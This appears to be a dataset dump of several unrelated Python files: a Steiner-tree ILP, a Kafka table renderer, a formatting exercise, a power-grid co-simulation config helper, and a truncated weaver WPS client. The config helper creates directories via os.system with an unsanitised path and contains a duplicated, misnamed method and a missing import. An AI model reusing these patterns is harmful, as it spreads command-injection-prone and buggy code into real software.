id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
498842
|
from gurobipy import Model, GRB, quicksum
import networkx as nx
def create_model(G, terminals, root=None, weight='weight', warmstart=[], lower_bound=None):
r""" Create an ILP for the minimum Steiner tree problem in graphs.
This formulation enforces a cycle in the solution if it is not connected.
Cycles are then forbidden by enforcing an increasing labelling along the edges of the solution.
To this end, the formulation is working with a directed graph internally.
As a slight modification of :obj:`graphilp.network.steiner_linear`, the constraints enforce
that the labels increase by one along each edge in the solution.
:param G: a weighted :py:class:`~graphilp.imports.ilpgraph.ILPGraph`
:param terminals: a list of nodes that need to be connected by the Steiner tree
:param root: a terminal chosen as the root of the Steiner tree
:param weight: name of the argument in the edge dictionary of the graph used to store edge cost
:param warmstart: a list of edges forming a tree in G connecting all terminals
:param lower_bound: give a known lower bound to the solution length
:return: a `gurobipy model <https://www.gurobi.com/documentation/9.1/refman/py_model.html>`_
ILP:
Let :math:`n = |V|` be the number of vertices in :math:`G`, :math:`T` the set of terminals,
and :math:`r` be a terminal chosen as the root of the Steiner tree.
Further, let :math:`\overrightarrow{E} := \{(u, v), (v, u) \mid \{u, v\} \in E\}`
be the directed edge set used in the internal representation.
.. math::
:nowrap:
\begin{align*}
\min \sum_{(u,v) \in \overrightarrow{E}} w_{uv} x_{uv}\\
\text{s.t.} &&\\
\forall \{u,v\} \in E: x_{uv} + x_{vu} \leq 1 && \text{(restrict edges to one direction)}\\
\ell_r = 1 && \text{(root label is set to 1)}\\
\forall t \in T: x_t = 1 && \text{(require terminals to be chosen)}\\
\sum_{v \in V} x_v - \sum_{(u, v) \in \overrightarrow{E}} x_{ij} = 1 && \text{(enforce circle when graph}\\
&& \text{is not connected)}\\
\forall \{u,v\}\in E: 2(x_{uv}+x_{vu}) - x_u - x_v \leq 0 && \text{(require vertices to be chosen}\\
&& \text{when edge is chosen)}\\
\forall i \in V: x_i-\sum_{u=i \vee v=i}x_{uv} \leq 0 && \text{(forbid isolated nodes)}\\
\forall \{u,v\}\in E: \ell_v - 2nx_{vu} \leq \ell_u + 1 + 2n(1-x_{uv}) && \text{(enforce increasing labels)}\\
\forall \{u,v\}\in E: \ell_u + 1 \leq 2nx_{vu} + \ell_v + 2n(1-x_{uv}) && \text{(enforce increasing labels)}\\
\forall \{u,v\}\in E: \ell_u - 2nx_{uv} \leq \ell_v + 1 + 2n(1-x_{vu}) && \text{(enforce increasing labels)}\\
\forall \{u,v\}\in E: \ell_v + 1 \leq 2nx_{uv} + \ell_u + 2n(1-x_{vu}) && \text{(enforce increasing labels)}\\
\forall v \in V: \ell_v - n x_v \leq 1&& \text{(set label to 1 when}\\
&& \text{vertex is not chosen)}\\
\forall v \in V: \sum_{(u,v) \in \overrightarrow{E}} x_{uv} \leq 1 && \text{(only one arrow into each vertex)}\\
\end{align*}
Example:
.. list-table::
:widths: 50 50
:header-rows: 0
* - .. image:: images/example_steiner.png
- `Steiner trees <https://github.com/VF-DE-CDS/GraphILP-API/blob/develop/graphilp/examples/SteinerTreesOnStreetmap.ipynb>`_
Find the shortest tree connecting a given set of nodes in a graph.
"""
# create model
m = Model("Steiner Tree")
n = G.G.number_of_nodes()
# If no root is specified, set it to be the first terminal in the terminals list
if (root is None):
root = terminals[0]
G.set_node_vars(m.addVars(G.G.nodes(), vtype=GRB.BINARY))
edge_set = set(G.G.edges())
edge_set = edge_set.union({(v, u) for u, v in edge_set})
G.set_edge_vars(m.addVars(edge_set, vtype=GRB.BINARY))
# node label variables used to avoid cycles
G.set_label_vars(m.addVars(G.G.nodes(), vtype=GRB.INTEGER, lb=1))
m.update()
# abbreviations
edges = G.edge_variables
nodes = G.node_variables
labels = G.label_variables
edge2var = dict(zip(edges.keys(), edges.values()))
# set objective: minimise the sum of the weights of edges selected for the solution
m.setObjective(quicksum([edge_var * G.G.edges[edge][weight] for edge, edge_var in edges.items()]), GRB.MINIMIZE)
# Each terminal and especially the root has to be chosen.
for node, node_var in nodes.items():
# the outer loop makes sure that terminals that are not in the graph are ignored
if node in terminals:
m.addConstr(node_var == 1)
elif node == root:
# root needs to be chosen
m.addConstr(node_var == 1)
# Label of the root needs to be set to 1
m.addConstr(labels[node] == 1)
# enforce cycle when graph is not connected
m.addConstr(quicksum(nodes.values()) - quicksum(edges.values()) == 1)
# at most one direction per edge can be chosen
m.addConstrs(edges[(u, v)] + edges[(v, u)] <= 1 for u, v in G.G.edges())
# if edge is chosen, both adjacent nodes need to be chosen
m.addConstrs(2*(edges[(u, v)] + edges[(v, u)]) - nodes[u] - nodes[v] <= 0 for u, v in G.G.edges())
# prohibit isolated vertices
for node, node_var in nodes.items():
edge_vars = []
for edge, edge_var in edges.items():
# If the node is startpoint or endpoint of the edge, add the edge
# to the array of edge variables
# Since the edges variable containt both directions, we can write this much short than
# in the previous formulation
if (node == edge[0] or node == edge[1]):
edge_vars.append(edge_var)
m.addConstr(node_var - quicksum(edge_vars) <= 0)
# labeling constraints: enforce increasing labels in edge direction of selected edges
for u, v in G.G.edges():
m.addConstr(labels[v] - 2 * n * edges[(v, u)] <= labels[u] + 1 + 2*n*(1 - edges[(u, v)]))
m.addConstr(labels[u] + 1 <= 2*n*edges[(v, u)] + labels[v] + 2*n*(1 - edges[(u, v)]))
m.addConstr(labels[u] - 2*n*edges[(u, v)] <= labels[v] + 1 + 2*n*(1 - edges[(v, u)]))
m.addConstr(labels[v] + 1 <= 2*n*edges[(u, v)] + labels[u] + 2*n*(1 - edges[(v, u)]))
# set label to 1 if node is not chosen
for v in G.G.nodes():
m.addConstr(labels[v] - n * nodes[v] <= 1)
# allow only one arrow into each node
for node in nodes:
constraint_edges = [(u, v) for (u, v) in edges.keys() if v == node]
m.addConstr(quicksum([edges[e] for e in constraint_edges]) <= 1)
# set lower bound
if lower_bound:
m.addConstr(quicksum([edge_var * G.G.edges[edge][weight] for edge, edge_var in edges.items()]) >= lower_bound)
# set warmstart
if len(warmstart) > 0:
# Initialise warmstart by excluding all edges and vertices from solution:
for edge_var in edges.values():
edge_var.Start = 0
for node_var in nodes.values():
node_var.Start = 0
for label_var in labels.values():
label_var.Start = 1
# Include all edges and vertices from the warmstart in the solution
# and set vertex labels:
start_node = warmstart[0][0]
warmstart_tree = nx.Graph()
warmstart_tree.add_edges_from(warmstart)
label = {start_node: 1}
labels[start_node].Start = 1
bfs = nx.bfs_edges(warmstart_tree, start_node)
for e in bfs:
label[e[1]] = label[e[0]] + 1
labels[e[1]].Start = label[e[1]]
edges[e].Start = 1
nodes[e[0]].Start = 1
nodes[e[1]].Start = 1
m.update()
return m
def extract_solution(G, model):
r""" Get the optimal Steiner tree in G
:param G: a weighted :py:class:`~graphilp.imports.ilpgraph.ILPGraph`
:param model: a solved Gurobi model for the minimum Steiner tree problem
:return: the edges of an optimal Steiner tree connecting all terminals in G
"""
solution = []
for edge, edge_var in G.edge_variables.items():
if edge_var.X > 0.5:
solution.append(edge)
return solution
|
498845
|
from typing import List
from rich.table import Table
from kaskade.kafka.models import GroupMember
from kaskade.renderables.paginated_table import PaginatedTable
class MembersTable(PaginatedTable):
def __init__(
self,
group_members: List[GroupMember],
page_size: int = -1,
page: int = 1,
row: int = 0,
) -> None:
self.group_members = group_members
super().__init__(len(group_members), page_size=page_size, page=page, row=row)
def renderables(self, start_index: int, end_index: int) -> List[GroupMember]:
return self.group_members[start_index:end_index]
def render_rows(self, table: Table, renderables: List[GroupMember]) -> None:
for group_member in renderables:
table.add_row(
str(group_member.group),
str(group_member.id),
str(group_member.client_id),
str(group_member.client_host),
)
def render_columns(self, table: Table) -> None:
header_style = "bright_magenta bold"
table.add_column("group", header_style=header_style, ratio=35, no_wrap=True)
table.add_column("id", header_style=header_style, ratio=35, no_wrap=True)
table.add_column("client id", header_style=header_style, ratio=15, no_wrap=True)
table.add_column(
"client host", header_style=header_style, ratio=15, no_wrap=True
)
|
498892
|
def print_formatted(number):
# your code goes here
width=len(str(bin(number))[2:])
for i in range(1,number+1):
print(str(i).rjust(width," "),oct(i)[2:].rjust(width," "),hex(i)[2:].upper().rjust(width," "),bin(i)[2:].rjust(width," "))
if __name__ == '__main__':
n = int(input())
print_formatted(n)
|
498929
|
import json
import uuid
import pdb
import os
from tdcosim.global_data import GlobalData
#===================================================================================================
#==============================================CONFIG===============================================
#===================================================================================================
class ConfigHelper(object):
"""A class to help the user create config for cosimulation.
Most methods are names add_* and remove_*. add _* adds a
particular configuration while remove_* will undo the change.
There is also a read, write, show and validate methods to
read an existing config file, write the current self.data
to a file, show the contents of self.data and validate the
configuration in self.data.
Typical usage,
foo=ConfigHelper()
foo.add_*()
foo.validate()
foo.write()"""
def __init__(self):
self.data={}
return None
#===================================================================================================
def add_psseconfig(self,rawFilePath,dyrFilePath, installLocation):
try:
psseConfig=self.data['psseConfig']={}
psseConfig['rawFilePath']=rawFilePath
psseConfig['dyrFilePath']=dyrFilePath
psseConfig['installLocation']=installLocation
except:
GlobalData.log()
#===================================================================================================
def remove_psseconfig(self):
try:
self.data.pop('psseConfig')
except:
GlobalData.log()
#===================================================================================================
def add_cosimhome(self,cosimHome):
try:
self.data['cosimHome']=cosimHome
except:
GlobalData.log()
#===================================================================================================
def remove_cosimhome(self):
try:
self.data.pop('cosimHome')
except:
GlobalData.log()
#===================================================================================================
def add_defaultfeederconfig(self,filePath,solarFlag,solarPenetration):
try:
if 'openDSSConfig' not in self.data:
self.data['openDSSConfig']={}
defConf=self.data['openDSSConfig']['defaultFeederConfig']={}
defConf['filePath']=filePath
defConf['solarFlag']=solarFlag
defConf['solarPenetration']=solarPenetration
except:
GlobalData.log()
#===================================================================================================
def remove_defaultfeederconfig(self):
try:
self.data['openDSSConfig'].pop('defaultFeederConfig')
except:
GlobalData.log()
#===================================================================================================
def add_manualfeederconfig(self,nodenumber,filePath,solarFlag,DERFilePath,initializeWithActual,
DERSetting,DERModelType,PVPlacement,
defaultDERParameters={"solarPenetration":0.02,"derId":"50","powerRating":50,
"VrmsRating":177.0,"steadyStateInitialization":True,"pvderScale": 1}):
"""Each input should be a list such that the entries in the list index should match.
for ex:nodenumber=[1,2],filePath=['case13.dss','case123.dss'],solarFlag=[0,1],
solarPenetration=[0,50] implies case13.dss is attached to transmission bus 1 and that there
is no solar generation in the distribution system."""
try:
if 'openDSSConfig' not in self.data:
self.data['openDSSConfig']={}
if 'manualFeederConfig' not in self.data['openDSSConfig']:
self.data['openDSSConfig']['manualFeederConfig']={}
self.data['openDSSConfig']['manualFeederConfig']['nodes']=[]
data=self.data['openDSSConfig']['manualFeederConfig']['nodes']
for i in range(len(nodenumber)):
thisNodeData={'DERParameters':{}}
thisNodeData['nodenumber']=nodenumber[i]
thisNodeData['filePath']=[filePath[i]]
thisNodeData['solarFlag']=solarFlag[i]
thisNodeData['DERFilePath']=DERFilePath[i]
thisNodeData['initializeWithActual']=initializeWithActual[i]
thisNodeData['DERSetting']=DERSetting[i]
thisNodeData['DERModelType']=DERModelType[i]
thisNodeData['DERParameters']['PVPlacement']=PVPlacement[i]
thisNodeData['DERParameters']['default']=defaultDERParameters
data.append(thisNodeData)
except:
GlobalData.log()
#===================================================================================================
def remove_manualfeederconfig(self):
try:
self.data['openDSSConfig'].pop('manualFeederConfig')
except:
GlobalData.log()
#===================================================================================================
def add_derparameters(self,nodenumber,solarPenetration,derId,powerRating=50.0,VrmsRating=177.0,
steadyStateInitialization=True,pvderScale=1):
"""Add DER parameters to a given nodenumber (nodeID/busID/busNumber)"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
derprop=targetnode['DERParameters']={}#overwrite even if previous data exists
default=derprop['default']={}
default['solarPenetration'] = solarPenetration
default['derId'] = derId
default['powerRating'] = powerRating
default['VrmsRating'] = VrmsRating
default['steadyStateInitialization'] = steadyStateInitialization
default['pvderScale'] = pvderScale
except:
GlobalData.log()
#===================================================================================================
def remove_derparameters(self,nodenumber):
"""Remove DER parameters of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode, """
Can't find the DERParameters accoding to the given nodenumber"""
targetnode.pop('DERParameters')
except:
GlobalData.log()
#===================================================================================================
def add_LVRT(self,nodenumber,LVRTkey,V_threshold,t_threshold,mode):
"""Each inputs of the LVRT except nodenumber should be a list such that the entries in
the list index should match.
for ex:LVRTkey=["1","2"],V_threshold=[0.6,0.7],t_threshold=[1.0,1.0],
mode=['mandatory_operation','mandatory_operation']
implies LVRT 1 and 2 are attached to transmission bus [nodenumber] and that LVRTs
will operate as mandatory operation with V and t threshholds"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
Can't find the DERParameters accoding to the given nodenumber"""
default=targetnode['DERParameters']['default']
LVRT = default['LVRT'] = {} #overwrite even if previous data exists
for i in range(len(LVRTkey)):
LVRT[LVRTkey[i]] = {}
LVRT[LVRTkey[i]]['V_threshold'] = V_threshold[i]
LVRT[LVRTkey[i]]['t_threshold'] = t_threshold[i]
LVRT[LVRTkey[i]]['mode'] = mode[i]
except:
GlobalData.log()
#===================================================================================================
def remove_LVRT(self,nodenumber):
"""Remove LVRT of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
Can't find the DERParameters accoding to the given nodenumber"""
targetnode['DERParameters']['default'].pop('LVRT')
except:
GlobalData.log()
#===================================================================================================
def add_HVRT(self,nodenumber,HVRTkey,V_threshold,t_threshold,mode):
"""Each inputs of the HVRT except nodenumber should be a list such that the entries in
the list index should match.
for ex:HVRTkey=["1","2"],V_threshold=[0.6,0.7],t_threshold=[1.0,1.0],
mode=['mandatory_operation','mandatory_operation']
implies HVRT 1 and 2 are attached to transmission bus [nodenumber] and that HVRTs
will operate as mandatory operation with V and t threshholds"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
Can't find the DERParameters accoding to the given nodenumber"""
default=targetnode['DERParameters']['default']
HVRT = default['HVRT'] = {} #overwrite even if previous data exists
for i in range(len(HVRTkey)):
HVRT[HVRTkey[i]] = {}
HVRT[HVRTkey[i]]['V_threshold'] = V_threshold[i]
HVRT[HVRTkey[i]]['t_threshold'] = t_threshold[i]
HVRT[HVRTkey[i]]['mode'] = mode[i]
except:
GlobalData.log()
#===================================================================================================
def remove_HVRT(self,nodenumber):
"""Remove HVRT of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
Can't find the DERParameters accoding to the given nodenumber"""
targetnode['DERParameters']['default'].pop('HVRT')
except:
GlobalData.log()
#===================================================================================================
def add_PVPlacement(self,nodenumber,PVPlacementkey,derId,powerRating,pvderScale):
"""Each inputs of the PVPlacement except nodenumber should be a list such that the entries in
the list index should match.
for ex:PVPlacementkey=["25","13"],derId=[50,50],powerRating=[50,50],
pvderScale=[1,1]
implies DER will attached to distribution node 25 and 13 in transmission bus [nodenumber]
and that the both DER will operate as DER setting as DERid 50, powerRating 50, and pvderScale 1"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode, """
Can't find the DERParameters accoding to the given nodenumber"""
DERParameters=targetnode['DERParameters']
PVPlacement = DERParameters['PVPlacement'] = {} #overwrite even if previous data exists
for i in range(len(PVPlacementkey)):
PVPlacement[PVPlacementkey[i]] = {}
PVPlacement[PVPlacementkey[i]]['derId'] = derId[i]
PVPlacement[PVPlacementkey[i]]['powerRating'] = powerRating[i]
PVPlacement[PVPlacementkey[i]]['pvderScale'] = pvderScale[i]
except:
GlobalData.log()
#===================================================================================================
def remove_HVRT(self,nodenumber):
"""Remove HVRT of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode, """
Can't find the DERParameters accoding to the given nodenumber"""
targetnode['DERParameters'].pop('PVPlacement')
except:
GlobalData.log()
#===================================================================================================
def add_simulationconfig(self,simType,protocol='loose_coupling',memoryThreshold=100.0):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
simConf=self.data['simulationConfig']
simConf['simType']=simType
simConf['protocol']=protocol
simConf['memoryThreshold']=memoryThreshold
except:
GlobalData.log()
#===================================================================================================
def remove_simulationconfig(self):
try:
self.data.pop('simulationConfig')
except:
GlobalData.log()
#===================================================================================================
def add_loadshape(self,loadShape):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
self.data['simulationConfig']['staticConfig']={}
self.data['simulationConfig']['staticConfig']['loadShape']=loadShape
except:
GlobalData.log()
#===================================================================================================
def remove_loadshape(self):
try:
self.data['simulationConfig']['staticConfig'].pop('loadShape')
except:
GlobalData.log()
#===================================================================================================
def add_fault(self,faultBus,faultImpedance,faultOnTime,faultOffTime):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
if 'dynamicConfig' not in self.data['simulationConfig']:
self.data['simulationConfig']['dynamicConfig']={}
self.data['simulationConfig']['dynamicConfig']['events']={}
events=self.data['simulationConfig']['dynamicConfig']['events']
if events.keys():
prevEvents=[]
for entry in events.keys():
prevEvents.append(int(entry))
else:
prevEvents=[0]
nextEvent=max(prevEvents)+1
events[str(nextEvent)]={}
events[str(nextEvent)]['time'],events[str(nextEvent)]['faultBus'],\
events[str(nextEvent)]['faultImpedance']=faultOnTime,faultBus,faultImpedance
events[str(nextEvent)]['type']='faultOn'
events[str(nextEvent+1)]={}
events[str(nextEvent+1)]['time']=faultOffTime
events[str(nextEvent+1)]['faultBus']=faultBus
events[str(nextEvent+1)]['type']='faultOff'
except:
GlobalData.log()
#===================================================================================================
def remove_fault(self,faultBus,faultOnTime,faultOffTime):
try:
events=self.data['simulationConfig']['dynamicConfig']['events']
popID=[]
for entry in events:
if events[entry]['faultBus']==faultBus and events[entry]['type']=='faultOn' and \
events[entry]['time']==faultOnTime:
popID.append(entry)
if events[entry]['faultBus']==faultBus and events[entry]['type']=='faultOff' and \
events[entry]['time']==faultOffTime:
popID.append(entry)
for entry in popID:
events.pop(entry)
except:
GlobalData.log()
#===================================================================================================
def add_simend(self,simEndTime):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
if 'dynamicConfig' not in self.data['simulationConfig']:
self.data['simulationConfig']['dynamicConfig']={}
if 'events' not in self.data['simulationConfig']['dynamicConfig']:
self.data['simulationConfig']['dynamicConfig']['events']={}
events=self.data['simulationConfig']['dynamicConfig']['events']
if events.keys():
prevEvents=[]
for entry in events.keys():
prevEvents.append(int(entry))
else:
prevEvents=[0]
nextEvent=max(prevEvents)+1
events[nextEvent]={}
events[nextEvent]['type']='simEnd'
events[nextEvent]['time']=simEndTime
except:
GlobalData.log()
#===================================================================================================
def remove_simend(self):
try:
assert 'events' in self.data['simulationConfig']['dynamicConfig'],"add events first"
events=self.data['simulationConfig']['dynamicConfig']['events']
for entry in events:
if events[entry]['type']=='simEnd':
events.pop(entry)
except:
GlobalData.log()
#===================================================================================================
def add_outputconfig(self,outputDir,simID=None,outputFileName='report.xlsx',outputFileType='xlsx'):
try:
if not simID:
simID=uuid.uuid4().hex
if 'outputConfig' not in self.data:
self.data['outputConfig']={}
self.data['outputConfig']['outputDir']=outputDir
self.data['outputConfig']['simID']=simID
self.data['outputConfig']['outputfilename']=outputFileName
self.data['outputConfig']['type']=outputFileType
except:
GlobalData.log()
#===================================================================================================
def remove_outputconfig(self):
try:
self.data.pop('outputConfig')
except:
GlobalData.log()
#===================================================================================================
def write(self,fpath):
"""Will write the configuration data in self.data to the given filename."""
try:
if not os.path.exists(os.path.dirname(fpath)):
os.system('mkdir {}'.format(os.path.dirname(fpath)))
json.dump(self.data,open(fpath,'w'),indent=3)
except:
GlobalData.log()
#===================================================================================================
def read(self,fpath):
"""Will load the config data from an existing config file.
Use this method to make modifications to an existing file.
P.S. This will overwrite self.data."""
try:
self.data=json.load(open(fpath))
except:
GlobalData.log()
#===================================================================================================
def show(self):
"""Will print out the configuration data in self.data"""
try:
pprint(self.data)
except:
GlobalData.log()
#===================================================================================================
def validate(self):
"""Validates if the provided settings are valid.
P.S. Validity in this context simply means that the provided options
satisfy the minimum requirements. When the config options are validated
by this method it does not mean that the cosimulation will run without
errors. For instance, this method does not verify, if a given filepath
exists.
P.S. This method will not find the issues when used in optimized mode
i.e. python -O foo.py or python -OO foo.py
Sample call: self.validate() will return without error when config is correct."""
try:
#join is used for better formatting while using GlobalData.log()
assert 'cosimHome' in self.data and self.data['cosimHome'],\
''.join(['cosimHome missing.\n','Please use add_cosimhome'])
assert 'psseConfig' in self.data,\
''.join(['psseConfig key is missing.\n','Please add pssConfig'])
assert 'installLocation' in self.data['psseConfig'] and \
'rawFilePath' in self.data['psseConfig'] and \
'dyrFilePath' in self.data['psseConfig'],\
''.join(['psse properties are missing.\n','Please add pssConfig properties'])
assert ('defaultFeederConfig' in self.data['openDSSConfig'] and \
len(self.data['openDSSConfig']['defaultFeederConfig'])>0) or \
len(self.data['openDSSConfig']['manualFeederConfig'])>0,\
''.join(['Either default feeder config or manual feeder config should be set.\n',\
'Use add_defaultfeederconfig or add_manualfeederconfig.'])
assert 'simulationConfig' in self.data,\
''.join(['simulation config missing.\n',\
'Use add_simulationconfig method to add simulation config.'])
assert 'simType' in self.data['simulationConfig'],\
''.join(['Simulation type missing.\n',\
'Use add_simulationconfig method to define simulation type.'])
assert 'outputConfig' in self.data,\
''.join(['output config not set.\n',\
'Use add_outputconfig method to set it.'])
return True
except:
GlobalData.log()
return False
|
498959
|
import logging
import warnings
from copy import deepcopy
from time import sleep
from typing import TYPE_CHECKING
from pyramid.httpexceptions import (
HTTPConflict,
HTTPForbidden,
HTTPInternalServerError,
HTTPNotFound,
HTTPOk,
HTTPUnauthorized
)
from pyramid.settings import asbool
from weaver import status
from weaver.exceptions import PackageExecutionError
from weaver.execute import EXECUTE_MODE_ASYNC, EXECUTE_RESPONSE_DOCUMENT, EXECUTE_TRANSMISSION_MODE_REFERENCE
from weaver.formats import CONTENT_TYPE_APP_FORM, CONTENT_TYPE_APP_JSON
from weaver.processes import opensearch
from weaver.processes.constants import OPENSEARCH_LOCAL_FILE_SCHEME
from weaver.processes.sources import get_data_source_from_url, retrieve_data_source_url
from weaver.processes.utils import map_progress
from weaver.processes.wps_process_base import WpsProcessInterface
from weaver.utils import (
fetch_file,
get_any_id,
get_any_message,
get_any_value,
get_job_log_msg,
get_log_monitor_msg,
pass_http_error,
request_extra
)
from weaver.visibility import VISIBILITY_PUBLIC
from weaver.warning import MissingParameterWarning
from weaver.wps.utils import map_wps_output_location
from weaver.wps_restapi import swagger_definitions as sd
if TYPE_CHECKING:
from typing import List, Union
from pywps.app import WPSRequest
from weaver.typedefs import JSON, UpdateStatusPartialFunction
LOGGER = logging.getLogger(__name__)
REMOTE_JOB_PROGRESS_PROVIDER = 1
REMOTE_JOB_PROGRESS_PREPARE = 2
REMOTE_JOB_PROGRESS_DEPLOY = 3
REMOTE_JOB_PROGRESS_VISIBLE = 4
REMOTE_JOB_PROGRESS_READY = 5
REMOTE_JOB_PROGRESS_EXECUTION = 9
REMOTE_JOB_PROGRESS_MONITORING = 10
REMOTE_JOB_PROGRESS_FETCH_OUT = 90
REMOTE_JOB_PROGRESS_COMPLETED = 100
class Wps3Process(WpsProcessInterface):
def __init__(self,
step_payload, # type: JSON
joborder, # type: JSON
process, # type: str
request, # type: WPSRequest
update_status, # type: UpdateStatusPartialFunction
):
super(Wps3Process, self).__init__(request)
self.provider = None # overridden if data source properly resolved
self.update_status = lambda _message, _progress, _status: update_status(
self.provider, _message, _progress, _status)
self.provider, self.url, self.deploy_body = self.resolve_data_source(step_payload, joborder)
self.process = process
def resolve_data_source(self, step_payload, joborder):
try:
# Presume that all EOImage given as input can be resolved to the same ADES
# So if we got multiple inputs or multiple values for an input, we take the first one as reference
eodata_inputs = opensearch.get_eo_images_ids_from_payload(step_payload)
data_url = "" # data_source will be set to the default ADES if no EOImages (anything but `None`)
if eodata_inputs:
step_payload = opensearch.alter_payload_after_query(step_payload)
value = joborder[eodata_inputs[0]]
if isinstance(value, list):
value = value[0] # Use the first value to determine the data source
data_url = value["location"]
reason = "(ADES based on {0})".format(data_url)
else:
reason = "(No EOImage -> Default ADES)"
data_source = get_data_source_from_url(data_url)
deploy_body = step_payload
url = retrieve_data_source_url(data_source)
except (IndexError, KeyError) as exc:
raise PackageExecutionError("Failed to save package outputs. [{!r}]".format(exc))
self.provider = data_source # fix immediately for `update_status`
self.update_status("{provider} is selected {reason}.".format(provider=data_source, reason=reason),
REMOTE_JOB_PROGRESS_PROVIDER, status.STATUS_RUNNING)
return data_source, url, deploy_body
def get_user_auth_header(self):
# TODO: find a better way to generalize this to Magpie credentials?
if not asbool(self.settings.get("ades.use_auth_token", True)):
return {}
ades_usr = self.settings.get("ades.username", None)
ades_pwd = self.settings.get("ades.password", None)
ades_url = self.settings.get("ades.wso2_hostname", None)
ades_client = self.settings.get("ades.wso2_client_id", None)
ades_secret = self.settings.get("ades.wso2_client_secret", None)
access_token = None
if ades_usr and ades_pwd and ades_url and ades_client and ades_secret:
ades_body = {
"grant_type": "password",
"client_id": ades_client,
"client_secret": ades_secret,
"username": ades_usr,
"password": <PASSWORD>,
"scope": "openid",
}
ades_headers = {"Content-Type": CONTENT_TYPE_APP_FORM, "Accept": CONTENT_TYPE_APP_JSON}
ades_access_token_url = "{}/oauth2/token".format(ades_url)
cred_resp = request_extra("post", ades_access_token_url,
data=ades_body, headers=ades_headers, settings=self.settings)
cred_resp.raise_for_status()
if CONTENT_TYPE_APP_JSON not in cred_resp.headers.get("Content-Type"):
raise HTTPUnauthorized("Cannot retrieve valid access token using credential or ADES configurations.")
access_token = cred_resp.json().get("access_token", None)
if not access_token:
warnings.warn("Could not retrieve valid access token although response is expected to contain one.",
MissingParameterWarning)
else:
warnings.warn(
"Could not retrieve at least one of required login parameters: "
"[ades.username, ades.password, ades.wso2_hostname, ades.wso2_client_id, ades.wso2_client_secret]",
MissingParameterWarning
)
return {"Authorization": "Bearer {}".format(access_token) if access_token else None}
def is_deployed(self):
return self.describe_process() is not None
def is_visible(self):
# type: (...) -> Union[bool, None]
"""
Gets the process visibility.
:returns:
True/False correspondingly for public/private if visibility is retrievable,
False if authorized access but process cannot be found,
None if forbidden access.
"""
LOGGER.debug("Get process WPS visibility request for [%s]", self.process)
response = self.make_request(method="GET",
url=self.url + sd.process_visibility_service.path.format(process_id=self.process),
retry=False,
status_code_mock=HTTPUnauthorized.code)
if response.status_code in (HTTPUnauthorized.code, HTTPForbidden.code):
return None
if response.status_code == HTTPNotFound.code:
return False
if response.status_code == HTTPOk.code:
json_body = response.json()
